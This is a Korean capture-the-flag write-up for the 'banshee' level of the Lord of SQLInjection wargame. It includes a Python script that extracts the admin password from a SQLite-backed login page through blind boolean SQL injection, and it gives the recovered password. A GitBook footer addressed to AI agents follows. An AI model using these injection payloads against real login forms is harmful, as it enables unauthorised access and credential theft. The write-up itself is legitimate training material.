> For the complete documentation index, see [llms.txt](https://donghyunlee.gitbook.io/write-up/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/banshee.md).

# banshee

첫 화면이다.

![](/files/-M-n6hqAZ01SPzeTGP5d)

파이썬 코드를 짜면 아래와 같다.

SQLite의 `UNICODE()` 를 MySQL의 `ASCII()` 나 `ORD()`  대신 사용하였다.

```python
import requests

URL = 'https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'login success!'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 8
def find_pw_length():
    pw_len = 1
    while query("' or id='admin' and length(pw)={}--".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# 0313091b
def find_pw():
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("' or id='admin' and unicode(substr(pw,{},1))={}--".format(pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

실행결과, pw는 `0313091b` 이다.

<https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?pw=0313091b> 에 접속하면 문제가 풀린다.

![](/files/-M-nAZIhObsIBluLA1to)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/banshee.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.